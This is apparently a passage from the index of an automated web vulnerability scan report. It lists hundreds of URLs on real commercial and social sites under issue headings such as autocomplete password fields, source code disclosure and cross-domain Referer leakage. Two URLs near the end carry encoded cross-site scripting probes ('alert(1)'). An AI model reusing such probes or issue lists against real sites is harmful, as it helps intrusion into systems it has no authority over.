15.434. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

15.435. https://www.box.net/

15.436. http://www.care2.com/news/

15.437. http://www.cisco.com/ipj/

15.438. http://www.cisco.com/warp/public/707/newsflash.html

15.439. http://www.codero.com/dedicated-server-hosting/

15.440. http://www.digitalia.be/

15.441. http://www.facebook.com/

15.442. http://www.facebook.com/BlackBerry

15.443. http://www.facebook.com/BlackBerryES

15.444. http://www.facebook.com/BlackBerryFR

15.445. http://www.facebook.com/BlackBerryNL

15.446. http://www.facebook.com/BlackBerryUK

15.447. http://www.facebook.com/BlackBerryZA

15.448. http://www.facebook.com/Craig.Marshall.Deutschland

15.449. http://www.facebook.com/ajouli1

15.450. http://www.facebook.com/americanexpress

15.451. http://www.facebook.com/dcmoncayo

15.452. http://www.facebook.com/fabianomorige

15.453. http://www.facebook.com/laprincesita.inigulable

15.454. http://www.facebook.com/marytere.medina

15.455. http://www.facebook.com/pages/Kledyde/344540630304

15.456. http://www.facebook.com/pages/OrthoSuperSitecom/296664256434

15.457. http://www.facebook.com/pages/Orthopaedic-Trauma-Association/212018968439

15.458. http://www.facebook.com/pages/OwnerIQ/54446991004

15.459. http://www.facebook.com/pages/Tipd/39630264367

15.460. http://www.facebook.com/pointeresortsaz

15.461. http://www.facebook.com/search/

15.462. http://www.facebook.com/uschi.eller

15.463. http://www.facebook.com/vibrantmedia

15.464. http://www.fbi.gov/nipc/welcome.htm

15.465. http://www.forex-direkt.de/

15.466. http://www.forexyard.com/css/quotes-chart.cssbdb85

15.467. http://www.fotoatelier-berlin.de/

15.468. http://www.godaddy.com/default.aspx

15.469. http://www.googleadservices.com/pagead/aclk

15.470. http://www.googleadservices.com/pagead/aclk

15.471. http://www.googleadservices.com/pagead/conversion/1033198129/

15.472. http://www.hyves.nl/

15.473. http://www.itbusinessedge.com/info/gglprojmgmtbeta.aspx/x26display_url=ITBusinessEdge.com/x26google_click_url=http:/googleads.g.doubleclick.net/aclk

15.474. http://www.itbusinessedge.com/info/gglprojmgmtbeta.aspx

15.475. http://www.linuxsecurity.com/

15.476. http://www.live.com/

15.477. http://www.livejournal.com/

15.478. http://www.membershiprewards.com/

15.479. http://www.membershiprewards.com/HomePage.aspx

15.480. http://www.membershiprewards.com/catalog/earn/default.aspx

15.481. http://www.membershiprewards.com/catalog/landing/open/Default.aspx

15.482. http://www.mybloglog.com/links/

15.483. http://www.myfitnesspal.com/nutrition-facts-calories/bjs

15.484. http://www.netvibes.com/

15.485. http://www.newsvine.com/

15.486. http://www.nmworkwear.de/

15.487. http://www.nmworkwear.de/index.php

15.488. http://www.omniture.com/

15.489. http://www.openforum.com/

15.490. https://www.openforum.com/

15.491. http://www.ortho.hyperguides.com/

15.492. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

15.493. http://www.plurk.com/

15.494. http://www.pointehilton.com/toolkit/presentation/shell/hpportal/assets/default.css

15.495. http://www.protopage.com/

15.496. http://www.rackspace.com/apps/email_hosting/exchange_hosting/

15.497. http://www.reddit.com/

15.498. http://www.sitejot.com/

15.499. http://www.splunk.com/download

15.500. http://www.splunk.com/index.php/download_track

15.501. http://www.splunk.com/page/securelink/signup/Splunk_Company_Overview

15.502. http://www.splunk.com/page/securelink/signup/Splunk_Executive_Brief

15.503. http://www.splunk.com/page/securelink/signup/Splunk_Product_Datasheet

15.504. http://www.splunk.com/page/securelink/signup/Splunk_and_MapReduce

15.505. http://www.splunk.com/page/securelink/signup/The_Guide_to_Splunk_and_Operational_Intelligence

15.506. http://www.stumbleupon.com/

15.507. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

15.508. http://www.surveymonkey.com/s/5HNX2M3

15.509. http://www.tel-inform.com/

15.510. http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

15.511. http://www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

15.512. http://www.traffictrack.de/tracking/mpr.php

15.513. http://www.tuenti.com/

15.514. http://www.vodafone.de/ptc/setCookie

15.515. http://www.whselfinvest.de/banner/whsbanner.php

15.516. http://www.wtp101.com/pixel

15.517. http://www.youtube.com/americanexpress

15.518. http://www.youtube.com/embed/208T0-OLXA8

15.519. http://www.youtube.com/embed/5aWd_-x1oPE

15.520. http://www.youtube.com/watch

15.521. http://www.zanox-affiliate.de/tpv/

15.522. https://www134.americanexpress.com/consumertravel/travel.do

15.523. https://www152.americanexpress.com/premium/credit-card-travel-insurance/home.do

15.524. https://www209.americanexpress.com/merchant/mainpagedom/authreg_showMainpage.do

15.525. https://www217.americanexpress.com/cards/home.do

15.526. https://www217.americanexpress.com/cards/shopping/index.jsp

15.527. http://www91.intel.com/b/ss/intelcorp,intelappdeveloper,intelcorpsw/1/H.20.3/s73248818481806

15.528. http://x.ligatus.com/blank.gif

15.529. http://x.ligatus.com/cgi-bin/ivw/CP/9470-215/83-692/83873-62519-_82053-58543-_83885-57091-//

15.530. http://x.ligatus.com/cgi-bin/ivw/CP/9470-215/83-692/84069-53009-_83885-57091-_84615-61457-//

15.531. http://yasnide.ivwbox.de/blank.gif

15.532. http://yasnide.ivwbox.de/cgi-bin/ivw/CP/hp-ano

15.533. http://youmob.com/

15.534. http://ypn-js.overture.com/

15.535. http://zap.mookie1.com/1/vibrantmedia/RadioshackLeadQ1/201101Q1/1/1/1${TIMESTAMP}@x90

15.536. http://zh-hans.splunk.com/

15.537. http://zh-hant.splunk.com/

15.538. http://ziffdavisbaseline.112.2o7.net/b/ss/ziffdavisbaseline,ziffdavisenterpriseglobal/1/H.17/s21695681395940

15.539. http://ziffdavisbaseline.112.2o7.net/b/ss/ziffdavisbaseline,ziffdavisenterpriseglobal/1/H.17/s21706094634719

15.540. http://ziffdavisbaseline.112.2o7.net/b/ss/ziffdavisbaseline,ziffdavisenterpriseglobal/1/H.17/s29366180438082

16. Password field with autocomplete enabled

16.1. https://axptravel.americanexpress.com/consumertravel/travel.do

16.2. https://axptravel.americanexpress.com/consumertravel/travel.do

16.3. https://axptravel.americanexpress.com/consumertravel/travel.do

16.4. http://channelmarketing.owneriq.com/rmb-account/login-page

16.5. http://dailyme.com/

16.6. http://digg.com/submit

16.7. http://friendfeed.com/

16.8. http://fussballmania.com/

16.9. http://fussballmania.com/

16.10. http://hhonors1.hilton.com/en_US/hh/home_index.do

16.11. http://hhonors1.hilton.com/en_US/hh/home_index.do

16.12. http://malsup.com/jquery/form/

16.13. http://malsup.com/jquery/form/

16.14. http://malsup.com/jquery/form/

16.15. http://malsup.com/jquery/form/

16.16. http://malsup.com/jquery/form/

16.17. http://malsup.com/jquery/form/

16.18. http://multiply.com/

16.19. http://ping.fm/

16.20. http://software.intel.com/en-us/articles/intel-cloud-builders/

16.21. http://software.intel.com/en-us/articles/intel-cloud-builders/

16.22. http://tbe.taleo.net/NA7/ats/careers/jobSearch.jsp

16.23. http://tipd.com/

16.24. http://tipd.com/

16.25. http://tipd.com/register

16.26. http://tipd.com/register

16.27. http://twitter.com/

16.28. http://twitter.com/ORTHOSuperSite

16.29. http://twitter.com/VibrantMedia

16.30. http://twitter.com/owneriq

16.31. http://twitter.com/tipd

16.32. http://unalog.com/

16.33. http://vodpod.com/

16.34. http://wordpress.com/

16.35. https://www.americanexpress.com/gift/giftcardslanding.shtml

16.36. http://www.arto.com/

16.37. http://www.bebo.com/

16.38. http://www.coe.gatech.edu/

16.39. http://www.connotea.org/

16.40. http://www.efort.org/

16.41. http://www.facebook.com/

16.42. http://www.facebook.com/

16.43. http://www.facebook.com/BlackBerry

16.44. http://www.facebook.com/BlackBerryES

16.45. http://www.facebook.com/BlackBerryFR

16.46. http://www.facebook.com/BlackBerryNL

16.47. http://www.facebook.com/BlackBerryUK

16.48. http://www.facebook.com/BlackBerryZA

16.49. http://www.facebook.com/Craig.Marshall.Deutschland

16.50. http://www.facebook.com/ajouli1

16.51. http://www.facebook.com/americanexpress

16.52. http://www.facebook.com/dcmoncayo

16.53. http://www.facebook.com/fabianomorige

16.54. http://www.facebook.com/laprincesita.inigulable

16.55. http://www.facebook.com/marytere.medina

16.56. http://www.facebook.com/pages/Kledyde/344540630304

16.57. http://www.facebook.com/pages/OrthoSuperSitecom/296664256434

16.58. http://www.facebook.com/pages/Orthopaedic-Trauma-Association/212018968439

16.59. http://www.facebook.com/plugins/likebox.php

16.60. http://www.facebook.com/pointeresortsaz

16.61. http://www.facebook.com/uschi.eller

16.62. http://www.facebook.com/vibrantmedia

16.63. http://www.fark.com/

16.64. http://www.godaddy.com/default.aspx

16.65. http://www.hyves.nl/

16.66. http://www.jamespot.com/

16.67. http://www.jazdtech.com/techdirect/

16.68. http://www.jumptags.com/

16.69. http://www.kledy.co.uk/

16.70. http://www.kledy.co.uk/

16.71. http://www.kledy.de/

16.72. http://www.kledy.de/bookmarks.php

16.73. http://www.kledy.de/bookmarks.php

16.74. http://www.kledy.de/bookmarks.php/

16.75. http://www.kledy.de/buttons.php

16.76. http://www.kledy.de/groups.php

16.77. http://www.kledy.de/impressum.php

16.78. http://www.kledy.de/login.php

16.79. http://www.kledy.de/login.php

16.80. http://www.kledy.de/topusers.php

16.81. http://www.kledy.es/

16.82. http://www.kledy.es/

16.83. http://www.kledy.eu/

16.84. http://www.kledy.it/

16.85. http://www.kledy.it/

16.86. http://www.kledy.us/

16.87. http://www.kledy.us/

16.88. http://www.klivio.com/

16.89. http://www.klivio.de/

16.90. http://www.linkagogo.com/

16.91. http://www.linkatopia.com/

16.92. http://www.linkedin.com/

16.93. http://www.linkedin.com/groupInvitation

16.94. http://www.livejournal.com/

16.95. http://www.migrationexpertzone.com/

16.96. http://www.myfitnesspal.com/nutrition-facts-calories/bjs

16.97. http://www.mylinkvault.com/

16.98. http://www.myspace.com/

16.99. http://www.myspace.com/

16.100. http://www.newsvine.com/

16.101. http://www.nmworkwear.de/

16.102. http://www.nmworkwear.de/

16.103. http://www.nmworkwear.de/index.php

16.104. http://www.nowpublic.com/

16.105. http://www.ortho.hyperguides.com/

16.106. http://www.ota.org/members_only/login_menu.cfm

16.107. http://www.pdfforge.org/

16.108. http://www.peppernews.eu/

16.109. http://www.reddit.com/

16.110. http://www.reddit.com/

16.111. http://www.reddit.com/

16.112. http://www.shoppinga.de/

16.113. http://www.sitejot.com/

16.114. http://www.spiele365.com/

16.115. http://www.splunk.com/page/sign_up

16.116. http://www.splunk.com/partners

16.117. http://www.squidoo.com/

16.118. http://www.squidoo.com/

16.119. http://www.stumbleupon.com/

16.120. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

16.121. http://www.technotizie.it/

16.122. http://www.technotizie.it/

16.123. http://www.tumblr.com/

16.124. http://www.tumblr.com/

16.125. https://www.xing.com/

16.126. http://www.yigg.de/

16.127. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

16.128. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

16.129. http://www1.hilton.com/en_US/hi/index.do

16.130. http://www1.hilton.com/en_US/hi/index.do

16.131. http://www1.hilton.com/en_US/hi/index.do

17. Source code disclosure

17.1. http://feeds.tipd.com/tipd

17.2. http://www.addthis.com/bookmark.php

17.3. https://www.infosecisland.com/blogview/5213-Splunk-4-Users-Review.html

17.4. http://www.splunk.com/

17.5. http://www.splunk.com/index.php

17.6. http://www.splunk.com/search/docs

17.7. http://www.technotizie.it/

18. Referer-dependent response

18.1. http://www.baselinemag.com/blank.gif

18.2. http://www.baselinemag.com/images/marketplace-hdr-bg.gif

18.3. http://www.baselinemag.com/images/marketplace-hdr.gif

18.4. http://www.baselinemag.com/spacer.gif

18.5. http://www.facebook.com/plugins/like.php

18.6. http://www.facebook.com/plugins/likebox.php

18.7. http://www.kledy.de/modules/buttons/buttons.php

18.8. http://www.peppernews.eu/templates/SquaretleFive/images/about.gif

18.9. http://www.youtube.com/embed/208T0-OLXA8

18.10. http://www.youtube.com/embed/5aWd_-x1oPE

18.11. http://www.youtube.com/v/VUCJyeb_3Mo

18.12. http://www.youtube.com/v/vu-10mHqFko

19. Cross-domain POST

19.1. http://gsgd.co.uk/sandbox/jquery/easing/

19.2. http://info.riministreet.com/50percentsavings.html

19.3. http://personalsavings.americanexpress.com/

19.4. http://personalsavings.americanexpress.com/cd-product.html

19.5. http://personalsavings.americanexpress.com/faq.html

19.6. http://personalsavings.americanexpress.com/open-account.html

19.7. http://personalsavings.americanexpress.com/product-comparison.html

19.8. http://personalsavings.americanexpress.com/savings-product.html

19.9. http://rydex-sgi.com/equalweight/

19.10. http://shop.vodafone.de/scripts/vodafone.global.js

19.11. http://www.bargainforce.com/

19.12. http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/

19.13. http://www.baselinemag.com/googlecse.html

19.14. http://www.beckerortho.com/

19.15. https://www.box.net/

19.16. http://www.cssplay.co.uk/menus/final_drop.html

19.17. http://www.eweek.com/c/s/Videos/

19.18. http://www.fbi.gov/about-us/investigate/cyber/cyber

19.19. http://www.fbi.gov/nipc/welcome.htm

19.20. http://www.hyves.nl/

19.21. https://www.infosecisland.com/blogview/5213-Splunk-4-Users-Review.html

19.22. http://www.kledy.de/impressum.php

19.23. http://www.linkfixerplus.com/

19.24. http://www.melsungen-online.de/Shopping/gutschein_gratisartikel.php

19.25. http://www.mittelstandsblog.de/

19.26. http://www.mittelstandsblog.de/

19.27. http://www.mittelstandsblog.de/2011/02/gfk-prognose-deutsche-2011-noch-konsumfreudiger/

19.28. http://www.mittelstandsblog.de/2011/02/gfk-prognose-deutsche-2011-noch-konsumfreudiger/

19.29. http://www.retailmenot.com/

19.30. http://www.stunnel.org/

20. Cross-domain Referer leakage

20.1. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.11

20.2. http://ad.doubleclick.net/adj/entzd.base/itmanagement

20.3. http://ad.doubleclick.net/adj/entzd.base/itmanagement

20.4. http://ad.doubleclick.net/adj/entzd.base/itmanagement

20.5. http://ad.doubleclick.net/adj/entzd.base/itmanagement

20.6. http://ad.doubleclick.net/adj/entzd.base/itmanagement

20.7. http://ad.doubleclick.net/adj/entzd.base/itmanagement

20.8. http://ad.doubleclick.net/adj/oiq.man.homeappliance/

20.9. http://answers.splunk.com/questions/ask

20.10. https://axptravel.americanexpress.com/consumertravel/travel.do

20.11. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html

20.12. https://cibng.ibanking-services.com/cib/CEBMainServlet/Login

20.13. http://cm.g.doubleclick.net/pixel

20.14. http://cm.g.doubleclick.net/pixel

20.15. http://corp.americanexpress.com/gcs/cards/

20.16. http://corp.americanexpress.com/gcs/cards/land/compare.aspx

20.17. http://coverall.splunk.com/themes/splunk_com/scripts/js/global.js

20.18. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/main.js

20.19. http://dslshop.vodafone.de/eshop/pv/97444194

20.20. http://dws1.etoro.com/ApplicationServices/Calendar/

20.21. https://ebus.ota.org/default.aspx

20.22. http://ecal.forexpros.com/e_cal.php

20.23. http://fls.doubleclick.net/activityi

20.24. http://fls.doubleclick.net/activityi

20.25. http://googleads.g.doubleclick.net/pagead/ads

20.26. http://googleads.g.doubleclick.net/pagead/ads

20.27. http://googleads.g.doubleclick.net/pagead/ads

20.28. http://googleads.g.doubleclick.net/pagead/ads

20.29. http://googleads.g.doubleclick.net/pagead/ads

20.30. http://googleads.g.doubleclick.net/pagead/ads

20.31. http://googleads.g.doubleclick.net/pagead/ads

20.32. http://googleads.g.doubleclick.net/pagead/ads

20.33. http://googleads.g.doubleclick.net/pagead/ads

20.34. http://googleads.g.doubleclick.net/pagead/ads

20.35. http://googleads.g.doubleclick.net/pagead/ads

20.36. http://googleads.g.doubleclick.net/pagead/ads

20.37. http://googleads.g.doubleclick.net/pagead/ads

20.38. http://googleads.g.doubleclick.net/pagead/ads

20.39. http://googleads.g.doubleclick.net/pagead/ads

20.40. http://googleads.g.doubleclick.net/pagead/ads

20.41. http://googleads.g.doubleclick.net/pagead/ads

20.42. http://googleads.g.doubleclick.net/pagead/ads

20.43. http://googleads.g.doubleclick.net/pagead/ads

20.44. http://googleads.g.doubleclick.net/pagead/ads

20.45. http://googleads.g.doubleclick.net/pagead/ads

20.46. http://googleads.g.doubleclick.net/pagead/ads

20.47. http://googleads.g.doubleclick.net/pagead/ads

20.48. http://googleads.g.doubleclick.net/pagead/ads

20.49. http://googleads.g.doubleclick.net/pagead/ads

20.50. http://googleads.g.doubleclick.net/pagead/ads

20.51. http://googleads.g.doubleclick.net/pagead/ads

20.52. http://googleads.g.doubleclick.net/pagead/ads

20.53. http://googleads.g.doubleclick.net/pagead/ads

20.54. http://googleads.g.doubleclick.net/pagead/ads

20.55. http://googleads.g.doubleclick.net/pagead/ads

20.56. http://googleads.g.doubleclick.net/pagead/ads

20.57. http://googleads.g.doubleclick.net/pagead/ads

20.58. http://googleads.g.doubleclick.net/pagead/ads

20.59. http://googleads.g.doubleclick.net/pagead/ads

20.60. http://googleads.g.doubleclick.net/pagead/ads

20.61. http://googleads.g.doubleclick.net/pagead/ads

20.62. http://googleads.g.doubleclick.net/pagead/ads

20.63. http://googleads.g.doubleclick.net/pagead/ads

20.64. http://googleads.g.doubleclick.net/pagead/ads

20.65. http://googleads.g.doubleclick.net/pagead/ads

20.66. http://googleads.g.doubleclick.net/pagead/ads

20.67. http://googleads.g.doubleclick.net/pagead/ads

20.68. http://googleads.g.doubleclick.net/pagead/ads

20.69. http://googleads.g.doubleclick.net/pagead/ads

20.70. http://googleads.g.doubleclick.net/pagead/ads

20.71. http://googleads.g.doubleclick.net/pagead/ads

20.72. http://googleads.g.doubleclick.net/pagead/ads

20.73. http://googleads.g.doubleclick.net/pagead/ads

20.74. http://googleads.g.doubleclick.net/pagead/ads

20.75. http://googleads.g.doubleclick.net/pagead/ads

20.76. http://googleads.g.doubleclick.net/pagead/ads

20.77. http://googleads.g.doubleclick.net/pagead/ads

20.78. https://home.americanexpress.com/home/corporations.shtml

20.79. http://itunes.apple.com/us/app/orthosupersite/id401876377

20.80. http://jqueryui.com/themeroller/

20.81. http://linkhelp.clients.google.com/tbproxy/lh/fixurl

20.82. http://lovely-faces.com/index.php

20.83. http://lovely-faces.com/index.php

20.84. http://lovely-faces.com/index.php

20.85. http://lovely-faces.com/index.php

20.86. http://lovely-faces.com/index.php

20.87. http://lovely-faces.com/index.php

20.88. http://lovely-faces.com/index.php

20.89. http://lovely-faces.com/index.php

20.90. http://lovely-faces.com/index.php

20.91. http://lovely-faces.com/index.php

20.92. http://lovely-faces.com/index.php

20.93. http://lovely-faces.com/index.php

20.94. http://lovely-faces.com/index.php

20.95. http://lovely-faces.com/index.php

20.96. http://lovely-faces.com/index.php

20.97. http://lovely-faces.com/index.php

20.98. http://lovely-faces.com/index.php

20.99. http://lovely-faces.com/index.php

20.100. http://lovely-faces.com/index.php

20.101. http://lovely-faces.com/index.php

20.102. http://lovely-faces.com/index.php

20.103. http://lovely-faces.com/index.php

20.104. http://lovely-faces.com/index.php

20.105. http://lovely-faces.com/index.php

20.106. http://lovely-faces.com/index.php

20.107. http://lovely-faces.com/index.php

20.108. http://lovely-faces.com/index.php

20.109. http://lovely-faces.com/index.php

20.110. http://lovely-faces.com/index.php

20.111. http://lovely-faces.com/index.php

20.112. http://lovely-faces.com/index.php

20.113. http://lovely-faces.com/index.php

20.114. http://lovely-faces.com/index.php

20.115. http://lovely-faces.com/index.php

20.116. http://lovely-faces.com/index.php

20.117. http://lovely-faces.com/index.php

20.118. http://lovely-faces.com/index.php

20.119. http://lovely-faces.com/index.php

20.120. http://lovely-faces.com/index.php

20.121. http://lovely-faces.com/index.php

20.122. http://lovely-faces.com/index.php

20.123. http://lovely-faces.com/index.php

20.124. http://lovely-faces.com/index.php

20.125. http://lovely-faces.com/index.php

20.126. http://lovely-faces.com/index.php

20.127. http://lovely-faces.com/index.php

20.128. http://lovely-faces.com/index.php

20.129. http://lovely-faces.com/index.php

20.130. http://lovely-faces.com/index.php

20.131. http://lovely-faces.com/index.php

20.132. http://lovely-faces.com/index.php

20.133. http://lovely-faces.com/index.php

20.134. http://lovely-faces.com/index.php

20.135. http://lovely-faces.com/index.php

20.136. http://lovely-faces.com/index.php

20.137. http://lovely-faces.com/index.php

20.138. http://lovely-faces.com/index.php

20.139. http://lovely-faces.com/index.php

20.140. http://lovely-faces.com/index.php

20.141. http://lovely-faces.com/index.php

20.142. http://lovely-faces.com/index.php

20.143. http://lovely-faces.com/index.php

20.144. http://lovely-faces.com/index.php

20.145. http://lovely-faces.com/index.php

20.146. http://lovely-faces.com/index.php

20.147. http://lovely-faces.com/index.php

20.148. http://lovely-faces.com/index.php

20.149. http://lovely-faces.com/index.php

20.150. http://lovely-faces.com/index.php

20.151. http://lovely-faces.com/index.php

20.152. http://lovely-faces.com/index.php

20.153. http://mm.chitika.net/track

20.154. http://personalsavings.americanexpress.com/

20.155. http://personalsavings.americanexpress.com/cd-product.html

20.156. http://personalsavings.americanexpress.com/faq.html

20.157. http://personalsavings.americanexpress.com/open-account.html

20.158. http://personalsavings.americanexpress.com/product-comparison.html

20.159. http://personalsavings.americanexpress.com/savings-product.html

20.160. http://rmncdn.com/widget_cdn.html

20.161. http://searchnet.chitika.net/audience

20.162. http://software.intel.com/en-us/articles/intel-cloud-builders/

20.163. http://software.intel.com/sites/oss/

20.164. http://spongecell.com/api/widgets/clickthrough/263365

20.165. http://statistics.wibiya.com/SetToolbarLoad.php

20.166. http://tbe.taleo.net/NA7/ats/careers/jobSearch.jsp

20.167. http://redacted/MRT/iview/264255445/direct

20.168. http://redacted/MRT/iview/264255445/direct

20.169. http://redacted/MRT/jview/267859374/direct

20.170. http://whitepixel.com/backend/remote/

20.171. https://www.aeprepaid.com/index.cfm

20.172. https://www.americanexpress.com/airlines-credit-card/

20.173. https://www.americanexpress.com/credit-card-rewards/

20.174. https://www.americanexpress.com/gift/giftcardslanding.shtml

20.175. https://www.americanexpress.com/gold-card/

20.176. https://www.americanexpress.com/no-annual-fee-credit-cards/

20.177. http://www.au2m8.com/v/

20.178. http://www.au2m8.com/v/

20.179. http://www.facebook.com/pages/Orthopaedic-Trauma-Association/212018968439

20.180. http://www.facebook.com/plugins/like.php

20.181. http://www.facebook.com/plugins/likebox.php

20.182. http://www.facebook.com/plugins/likebox.php

20.183. http://www.facebook.com/plugins/likebox.php

20.184. http://www.facebook.com/plugins/likebox.php

20.185. http://www.facebook.com/plugins/likebox.php

20.186. http://www.filetransit.com/demo.php

20.187. http://www.filetransit.com/download.php

20.188. http://www.filetransit.com/files.php

20.189. http://www.filetransit.com/freeware.php

20.190. http://www.filetransit.com/screenshot.php

20.191. http://www.filetransit.com/view.php

20.192. http://www.godaddy.com/default.aspx

20.193. http://www.google.com/url

20.194. http://www.google.com/url

20.195. http://www.google.com/url

20.196. http://www.google.com/url

20.197. http://www.google.com/url

20.198. https://www.google.com/adsense/support/bin/request.py

20.199. http://www.kledy.co.uk/

20.200. http://www.kledy.de/bookmarks.php

20.201. http://www.kledy.es/

20.202. http://www.kledy.it/

20.203. http://www.kledy.us/

20.204. http://www.linkedin.com/groupInvitation

20.205. https://www.openforum.com/

20.206. http://www.othawaii.com/default.asp

20.207. http://www.owneriq.com/ownership-targeting

20.208. http://www.retailmenot.com/gui/widget.html

20.209. http://www.splunk.com/

20.210. http://www.splunk.com/download

20.211. http://www.splunk.com/videos

20.212. http://www.splunk.com/view/contact-us/SP-CAAAAH7

20.213. http://www.vibrantmedia.com/whatisIntelliTXT.asp

20.214. http://www.whselfinvest.de/banner/whsbanner.php

20.215. http://www.wyanokeis.com/create.aspx

20.216. http://www201.americanexpress.com/business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789

20.217. http://www201.americanexpress.com/business-credit-cards/business-credit-cards

20.218. http://www201.americanexpress.com/business-credit-cards/business-solutions/overview

20.219. http://www201.americanexpress.com/business-credit-cards/find-business-credit-cards

20.220. http://www201.americanexpress.com/business-credit-cards/see-all-business-credit-cards

20.221. http://www201.americanexpress.com/getthecard/

20.222. http://www201.americanexpress.com/getthecard/home

20.223. https://www201.americanexpress.com/MobileWeb/index.jsp

20.224. https://www209.americanexpress.com/merchant/marketing-data/pages/home

20.225. https://www209.americanexpress.com/merchant/marketing-data/pages/marketingprograms

20.226. https://www209.americanexpress.com/merchant/marketing-data/pages/reportsandtrends

20.227. http://www212.americanexpress.com/dsmlive/dsm/dom/us/en/legaldisclosures/websiterulesandregulations.do

20.228. https://www212.americanexpress.com/dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do

20.229. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/feefreeservices/pages/globalassist_allccsg_shareddetails.do

20.230. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do

20.231. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/pass_markup_homepage.do

20.232. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/travelerschequesandforeigncurrency.do

20.233. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

20.234. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/smallbusiness/businesstravel/businesstravel.do

20.235. https://www212.americanexpress.com/dsmlive/dsm/dom/us/merchants/nonsecure/acceptthecard.do

20.236. https://www212.americanexpress.com/dsmlive/dsm/dom/us/merchants/nonsecure/manageyouraccount.do

20.237. https://www212.americanexpress.com/dsmlive/dsm/int/contactus/personalsavings.do

20.238. https://www212.americanexpress.com/dsmlive/dsm/int/fxip/fxinternationalpayments.do

20.239. https://www212.americanexpress.com/dsmlive/dsm/int/us/en/cmaproductspage.do

20.240. https://www295.americanexpress.com/entertainmentaccess/home.do

20.241. https://www295.americanexpress.com/premium/credit-card-travel-insurance/home.do

20.242. http://www7.aaos.org/education/courses/course_detail.aspx

21. Cross-domain script include

21.1. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.11

21.2. http://answers.splunk.com/

21.3. http://answers.splunk.com/questions/ask

21.4. http://bankskripsi.com/article/casas

21.5. http://bassistance.de/jquery-plugins/jquery-plugin-validation/

21.6. http://blog.freedownloadscenter.com/

21.7. http://blog.owneriq.com/

21.8. http://blog.tipd.com/

21.9. http://blog.vibrantmedia.com/

21.10. http://brandonaaron.net/

21.11. http://buzz.yahoo.com/

21.12. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html

21.13. http://channelmarketing.owneriq.com/rmb-account/login-page

21.14. http://chattino.com/

21.15. http://creativecommons.org/licenses/by-nc-nd/2.5/

21.16. http://current.com/

21.17. http://dailyme.com/

21.18. http://dean.edwards.name/weblog/2006/03/base/

21.19. http://developer.yahoo.com/yui/

21.20. http://developer.yahoo.com/yui/license.html

21.21. http://digg.com/submit

21.22. http://docs.jquery.com/Plugins/Validation

21.23. http://docs.jquery.com/UI

21.24. http://docs.jquery.com/UI/Datepicker

21.25. http://docs.jquery.com/UI/Tabs

21.26. http://driverbyte.com/a

21.27. http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload

21.28. https://ebus.ota.org/default.aspx

21.29. http://en.wikipedia.org/wiki/MIT_License

21.30. http://etfdb.com/

21.31. http://fls.doubleclick.net/activityi

21.32. http://funp.com/

21.33. http://fussballmania.com/

21.34. http://getclicky.com/106253

21.35. http://googleads.g.doubleclick.net/pagead/ads

21.36. http://googleads.g.doubleclick.net/pagead/ads

21.37. http://groups.google.com/group/jquery-dev/browse_thread/thread/36395b7ab510dd5d

21.38. http://gsgd.co.uk/sandbox/jquery/easing/

21.39. http://hellotxt.com/

21.40. http://hhonors1.hilton.com/en_US/hh/home_index.do

21.41. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem

21.42. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/

21.43. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%27%3balert%281%29%2f%2f35f276845e/product_problem/

